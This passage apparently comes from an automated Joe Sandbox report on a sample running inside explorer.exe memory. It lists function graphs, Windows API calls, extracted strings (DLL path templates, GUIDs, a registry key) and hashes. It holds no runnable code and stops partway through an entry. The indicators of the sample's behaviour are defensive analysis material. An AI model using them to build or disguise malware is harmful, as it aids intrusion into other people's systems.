                                                          control_flow_graph 539 329eee0-329eefc 541 329ef9c-329efa8 539->541 542 329ef02-329ef20 539->542 543 329efae-329efbb call 329efd1 541->543 544 329f036-329f2a4 541->544 545 329ef78-329ef83 542->545 546 329ef26-329ef35 542->546 555 329efc0 543->555 553 329f2ba-329f2e5 544->553 554 329f2aa-329f2b6 544->554 548 329ef89-329ef96 545->548 550 329ef3b-329ef41 546->550 551 329ef5e-329ef68 546->551 548->541 552 329ef6d 550->552 551->552 552->548 558 329f2eb 553->558 559 329f2f1-329f31c SleepEx 553->559 554->553 557 329efc1-329efc9 555->557 557->557 560 329efcc-329efcf 557->560 558->559 562 329f335-329f351 559->562 560->544 563 329f36b 562->563 564 329f357-329f374 call 329f365 562->564 566 329f375-329f37d 563->566 564->566 568 329f3a1-329f436 566->568 569 329f383-329f39b 566->569 576 329f44a 568->576 569->568 576->576
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.3815524335.0000000002FCA000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F50000, based on PE: true
                                                          • Associated: 0000000E.00000002.3814386711.0000000002F50000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002F51000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002F95000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002FC1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002FC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815491913.0000000002FC8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815524335.0000000003356000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815524335.000000000335E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815524335.000000000336D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3824350788.000000000336E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2f50000_explorer.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8fb23a888982363776730a68e1897667f2ad69ed1ac039e299bbea66cc51430e
                                                          • Instruction ID: 09f68ef461f9651153b8822ace893be5484f7c914ebc9001165df40826979a3c
                                                          • Opcode Fuzzy Hash: 8fb23a888982363776730a68e1897667f2ad69ed1ac039e299bbea66cc51430e
                                                          • Instruction Fuzzy Hash: AF41D37793A651EFEB41CFB0C5402EC33E2E708769F1A4817CB55A7B48D27868E58B84
                                                          Function 0329DA94 Relevance: 1.6, APIs: 1, Instructions: 123COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 577 329da94-329dab2 579 329dab8-329dae9 577->579 580 329db50-329db5c 577->580 585 329daef-329dafa 579->585 586 329db24-329db2e 579->586 581 329dbed-329de99 580->581 582 329db62-329db67 call 329db7b 580->582 592 329de9f 581->592 593 329dea5-329decc 581->593 582->581 590 329db00-329db06 585->590 591 329db15 585->591 588 329db32-329db4a 586->588 588->580 595 329db1f 590->595 591->595 592->593 596 329ded8-329dee2 593->596 597 329ded2 593->597 595->588 598 329df08-329df5c SleepEx 596->598 599 329dee8-329def1 596->599 597->596 601 329df67-329df68 598->601 599->598 600 329def7 599->600 600->598 602 329df6e 601->602 603 329df74-329df80 601->603 602->603 604 329df94-329df9a 603->604 605 329df86 603->605 606 329dfa0 604->606 607 329dfa5-329dfbf 604->607 605->604 606->607 609 329dfc8-329e011 607->609 610 329dfc5 607->610 612 329e01d-329e04b 609->612 613 329e017 609->613 610->609 614 329e06d-329e072 612->614 615 329e051-329e069 612->615 613->612 617 329e082 614->617 615->614 617->617
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.3815524335.0000000002FCA000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F50000, based on PE: true
                                                          • Associated: 0000000E.00000002.3814386711.0000000002F50000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002F51000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002F95000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002FC1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002FC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815491913.0000000002FC8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815524335.0000000003356000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815524335.000000000335E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815524335.000000000336D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3824350788.000000000336E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2f50000_explorer.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: eaafe1f2f795f2b6714edb262d19ab8c0f7c1c6b70c3dfbdca59ca8fd329b20d
                                                          • Instruction ID: 71891c838f7225f8879840d811d21ef2b93318ffc16ea5e70292daaed39f9760
                                                          • Opcode Fuzzy Hash: eaafe1f2f795f2b6714edb262d19ab8c0f7c1c6b70c3dfbdca59ca8fd329b20d
                                                          • Instruction Fuzzy Hash: A451DF7783A201CFEB10CFB5C4512DD73E3E328768B1A0927D6212BB98D2B518E5DB80

                                                          Non-executed Functions

                                                          Function 02F73FF0 Relevance: 67.0, APIs: 37, Strings: 1, Instructions: 509threadsynchronizationtimeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.3814420381.0000000002F51000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F50000, based on PE: true
                                                          • Associated: 0000000E.00000002.3814386711.0000000002F50000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002F95000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002FC1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002FC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815491913.0000000002FC8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815524335.0000000002FCA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815524335.0000000003356000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815524335.000000000335E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815524335.000000000336D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3824350788.000000000336E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2f50000_explorer.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseHandle$CreateThread$EventResumeTimersetsockopt$ChangeConcurrency::details::platform::__ObjectQueueSingleWaitclosesocket
                                                          • String ID: d
                                                          • API String ID: 1946823053-2564639436
                                                          • Opcode ID: f7fb62e237b952c0455729f6b1c816bc8dfd1e94051e666b7e619fdde267be2a
                                                          • Instruction ID: ad648151b5df93802a42214be124a18c965b9e60af6b8461cf3df8c771bd4010
                                                          • Opcode Fuzzy Hash: f7fb62e237b952c0455729f6b1c816bc8dfd1e94051e666b7e619fdde267be2a
                                                          • Instruction Fuzzy Hash: 0C52E632219B84C5EB64CF14E49836AB3B0F7D4B84F545526DA9E47BA8DF7CC499CB00
                                                          Function 02F811C4 Relevance: 18.0, APIs: 9, Strings: 1, Instructions: 478COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.3814420381.0000000002F51000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F50000, based on PE: true
                                                          • Associated: 0000000E.00000002.3814386711.0000000002F50000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002F95000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002FC1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002FC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815491913.0000000002FC8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815524335.0000000002FCA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815524335.0000000003356000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815524335.000000000335E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815524335.000000000336D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3824350788.000000000336E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2f50000_explorer.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: __doserrno_errno_invalid_parameter_noinfo
                                                          • String ID: U
                                                          • API String ID: 3902385426-4171548499
                                                          • Opcode ID: a98af1970a3c05928a317ade8a255857355bad4048c69515d8cb2208c38d4a3d
                                                          • Instruction ID: fb3356b92e118a7a955a4ab0b169b3711cc035f3e7ff7886c3c446e97100e917
                                                          • Opcode Fuzzy Hash: a98af1970a3c05928a317ade8a255857355bad4048c69515d8cb2208c38d4a3d
                                                          • Instruction Fuzzy Hash: B502013370468586DB20AF29E4443AFB7A1F785BD8F544226DB8E4BB68DB3DC046CB10
                                                          Function 02F7B57C Relevance: 16.5, APIs: 8, Strings: 1, Instructions: 734COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.3814420381.0000000002F51000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F50000, based on PE: true
                                                          • Associated: 0000000E.00000002.3814386711.0000000002F50000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002F95000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002FC1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002FC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815491913.0000000002FC8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815524335.0000000002FCA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815524335.0000000003356000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815524335.000000000335E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815524335.000000000336D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3824350788.000000000336E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2f50000_explorer.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: write_multi_char$_errno$_getptd_invalid_parameter_noinfowrite_char
                                                          • String ID: %s\%s
                                                          • API String ID: 622798868-4073750446
                                                          • Opcode ID: cace0e321c5042345f88c4d8c2bfe08f52f92a77f399a163db76c838d19c276e
                                                          • Instruction ID: b36cd372ab55aeda139ea04ddc0f3c46319b269f6b0fc7422adfd1424a848f37
                                                          • Opcode Fuzzy Hash: cace0e321c5042345f88c4d8c2bfe08f52f92a77f399a163db76c838d19c276e
                                                          • Instruction Fuzzy Hash: 8B42D173A0878086EB258B69E45036E7BB1F786BCCF14512BDF4A97B94EB79C441CB40
                                                          Function 02F8021C Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 162COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.3814420381.0000000002F51000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F50000, based on PE: true
                                                          • Associated: 0000000E.00000002.3814386711.0000000002F50000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002F95000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002FC1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002FC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815491913.0000000002FC8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815524335.0000000002FCA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815524335.0000000003356000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815524335.000000000335E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815524335.000000000336D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3824350788.000000000336E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2f50000_explorer.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _set_error_mode
                                                          • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                          • API String ID: 1949149715-4022980321
                                                          • Opcode ID: d3fa20851957e13b34c86876f45d2efd98ef2a2b409558c7538f8607b5467e20
                                                          • Instruction ID: 75feda8510138e197e22ea28850609907537f1d0ea3a75434e2779a025ebd2c7
                                                          • Opcode Fuzzy Hash: d3fa20851957e13b34c86876f45d2efd98ef2a2b409558c7538f8607b5467e20
                                                          • Instruction Fuzzy Hash: 9351D426B0478186EB34EB35A95476EB366F785BC4F94413ADF5943B54DF38C10ACB04
                                                          Function 02F6DDD0 Relevance: .6, Instructions: 577COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.3814420381.0000000002F51000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F50000, based on PE: true
                                                          • Associated: 0000000E.00000002.3814386711.0000000002F50000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002F95000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002FC1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002FC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815491913.0000000002FC8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815524335.0000000002FCA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815524335.0000000003356000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815524335.000000000335E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815524335.000000000336D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3824350788.000000000336E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2f50000_explorer.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5a583ae86051e2f7dd8e1f5aad3c29afd1add19ea6dbc22acd9425ae77474c6f
                                                          • Instruction ID: 11c9548e02bbf9e34e2109ebd91e514d909c6e7ab398f02225c8aea54462439b
                                                          • Opcode Fuzzy Hash: 5a583ae86051e2f7dd8e1f5aad3c29afd1add19ea6dbc22acd9425ae77474c6f
                                                          • Instruction Fuzzy Hash: 722267767181408F975CCB1CE8A162AB7E2E7CC744B04852DF69BC7B99DA38E911CF48
                                                          Function 02F57E40 Relevance: 270.0, APIs: 66, Strings: 88, Instructions: 482memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 02F62AB0: SHGetKnownFolderPath.SHELL32 ref: 02F62ACF
                                                            • Part of subcall function 02F62AB0: LocalAlloc.KERNEL32 ref: 02F62AE3
                                                            • Part of subcall function 02F62AB0: wnsprintfW.SHLWAPI ref: 02F62B1C
                                                            • Part of subcall function 02F62AB0: CoTaskMemFree.COMBASE ref: 02F62B3D
                                                          • LocalAlloc.KERNEL32 ref: 02F57E7E
                                                          • LocalAlloc.KERNEL32 ref: 02F57E9F
                                                          • wnsprintfW.SHLWAPI ref: 02F57EDF
                                                          • wnsprintfW.SHLWAPI ref: 02F57EFD
                                                          • wnsprintfW.SHLWAPI ref: 02F57F31
                                                          • wnsprintfW.SHLWAPI ref: 02F57F4F
                                                          • LocalFree.KERNEL32 ref: 02F58824
                                                          • LocalFree.KERNEL32 ref: 02F58850
                                                          • LocalFree.KERNEL32 ref: 02F5885B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.3814420381.0000000002F51000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F50000, based on PE: true
                                                          • Associated: 0000000E.00000002.3814386711.0000000002F50000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002F95000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002FC1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002FC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815491913.0000000002FC8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815524335.0000000002FCA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815524335.0000000003356000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815524335.000000000335E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815524335.000000000336D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3824350788.000000000336E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2f50000_explorer.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Local$wnsprintf$Free$Alloc$FolderKnownPathTask
                                                          • String ID: #$%s.DLL$%s.DLL$%s.DLL$%s.DLL$%s.DLL$%s.DLL$%s.DLL$%s.DLL$%s.DLL$%s.DLL$%s.DLL$%s.DLL$%s.DLL$%s.DLL$%s.DLL$%s.DLL$%s.DLL$%s.DLL$%s.DLL$%s.DLL$%s.DLL$%s.DLL$%s.DLL$%s.DLL$%s.DLL$%s.DLL$%s.DLL$%s.DLL$%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL$%s\%s.DLL${004E61D2-B1A6-453E-A10E-D6F69435D35E}${18CDF165-7894-44E4-9FFA-578E571800E8}${1A4049EC-E863-475E-B0F9-F0A19D7885CC}${1F4DF400-C7B3-4406-B505-1E5CF9EFB160}${267A2FC6-50EF-4E54-8543-9BB4DE5C6053}${2FDA5827-6335-4F1E-AD8E-999AAB6071DC}${31464A5D-0D36-4AA5-AEB2-C74EDD2817A9}${3D905155-9434-4195-8464-DE02A21BA8C7}${4078E4C3-4343-4B8F-8146-1DA418247E6B}${44C10974-E04F-4C62-9A56-F2AF107351C8}${46A2007D-F0D2-4943-A17A-19DB73A54812}${5449DA5C-07A1-4ADE-BE83-80C8EE9B2B7E}${62516CFC-E773-4311-A789-8472E13A8AAD}${628CF3FA-034B-48AC-9355-E20D347418F8}${660211C7-79FD-43A0-A472-9767892817DB}${8F14C1E5-E6AC-4C3D-A8DD-5B4D4909800A}${91218178-D0F6-4F8C-BA8C-7EBFEA1C34B9}${9557335B-46A5-463B-AD0C-C7416D4D6D8C}${B3C14972-6158-4825-8B60-5E7918F1E5A6}${BD21025C-939F-464A-B3BB-BF8B3ACFDF58}${BECB5B3A-BF95-4F4C-8B93-D20219E73D0E}${C7B03ADC-CB20-4B70-9113-5C13E9D19D6A}${D338351C-5F73-4465-B0EF-7AEEAD9FF0EB}${E0E54D31-8477-4347-BF2D-BB6868EDE489}${E4038905-EAD9-497B-B80A-5AE75F78B83F}${E5614FA7-73D6-4ADB-B880-2E93461C9F99}${ECF55907-C41F-4968-99BA-24112B6BFCC8}${EDED13B5-4C60-4041-AD32-18523A711686}${FBDC8CF7-513C-41B4-8807-25880ABE465F}
                                                          • API String ID: 3806943089-4288810593
                                                          • Opcode ID: 6ee5ce8c9bae93b66d9e37986d5db7fea350060ba2e8ea2f8018d865bbf34a7a
                                                          • Instruction ID: 9c18862cc733dd6e8fb59c77a87bd1531e8a52df335bb1f5427fb56b914d3d69
                                                          • Opcode Fuzzy Hash: 6ee5ce8c9bae93b66d9e37986d5db7fea350060ba2e8ea2f8018d865bbf34a7a
                                                          • Instruction Fuzzy Hash: D452C335518A8BD6EB109F55E8187AAA371F7847C9F604133EA8E43B68DF3CD54ACB40
                                                          Function 02F596B0 Relevance: 44.0, APIs: 22, Strings: 3, Instructions: 246registrymemorystringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.3814420381.0000000002F51000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F50000, based on PE: true
                                                          • Associated: 0000000E.00000002.3814386711.0000000002F50000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002F95000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002FC1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002FC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815491913.0000000002FC8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815524335.0000000002FCA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815524335.0000000003356000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815524335.000000000335E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815524335.000000000336D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3824350788.000000000336E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2f50000_explorer.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocLocalValue$lstrcpy
                                                          • String ID: .DLL$SOFTWARE\%s${B6B263A2-A205-4196-A192-2C4C737F10A6}
                                                          • API String ID: 2708694652-2590296548
                                                          • Opcode ID: 1dd1e65bbe222c0b6f9f293943a48f24894b8da1b3bf1cd675561a969181d8cb
                                                          • Instruction ID: da94417d264b2bf84b1e3f0d7a5ab8dc5cd04181486958e3d7dc2761a9a0785e
                                                          • Opcode Fuzzy Hash: 1dd1e65bbe222c0b6f9f293943a48f24894b8da1b3bf1cd675561a969181d8cb
                                                          • Instruction Fuzzy Hash: AAD1D532208AC5C2D765DB15E8983AAB3B5F7C8B84F504536DB8A87B68DF7CC585CB40
                                                          Function 02F65700 Relevance: 26.3, APIs: 13, Strings: 2, Instructions: 94memoryfileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 02F62830: SHGetKnownFolderPath.SHELL32 ref: 02F628A7
                                                            • Part of subcall function 02F62830: LocalAlloc.KERNEL32 ref: 02F628FC
                                                            • Part of subcall function 02F62830: CoTaskMemFree.COMBASE ref: 02F62955
                                                          • CreateDirectoryW.KERNEL32 ref: 02F65738
                                                          • LocalAlloc.KERNEL32 ref: 02F6575E
                                                          • CreateFileW.KERNEL32 ref: 02F657CE
                                                          • GetLastError.KERNEL32 ref: 02F657D9
                                                          • LocalFree.KERNEL32 ref: 02F65876
                                                          • LocalFree.KERNEL32 ref: 02F65881
                                                          • LocalFree.KERNEL32 ref: 02F658D7
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.3814420381.0000000002F51000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F50000, based on PE: true
                                                          • Associated: 0000000E.00000002.3814386711.0000000002F50000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002F95000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002FC1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3814420381.0000000002FC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815491913.0000000002FC8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815524335.0000000002FCA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815524335.0000000003356000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815524335.000000000335E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3815524335.000000000336D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 0000000E.00000002.3824350788.000000000336E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_14_2_2f50000_explorer.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Local$Free$AllocCreate$DirectoryErrorFileFolderKnownLastPathTask
                                                          • String ID: %s%s$P
                                                          • API String ID: 1317037737-50959982
                                                          • Opcode ID: ffbfbc54b474090aa0eb3f629d470b164b68577bb2b1d15008f277f7dc270dc8
                                                          • Instruction ID: 76b3499bd3ca74057db07072adebe4f4997f1532a3f499b25ed6f4a36dae9ee0
                                                          • Opcode Fuzzy Hash: ffbfbc54b474090aa0eb3f629d470b164b68577bb2b1d15008f277f7dc270dc8
                                                          • Instruction Fuzzy Hash: AC51F932508A4582E710DB25F85876AB771F7C17E4FA00325E7AA86AE8CF7DC499CB00
                                                          Function 02F81CF4 Relevance: 18.1, APIs: 12, Instructions: 149COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000E.00000002.3814420381.0000000002F51000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F50000, based on PE: true
                                                          • Associated: 0000000E.00000002.3814386711.0000000002F50000.00000004.00001000.00020000.00000000.sdmpDownload File
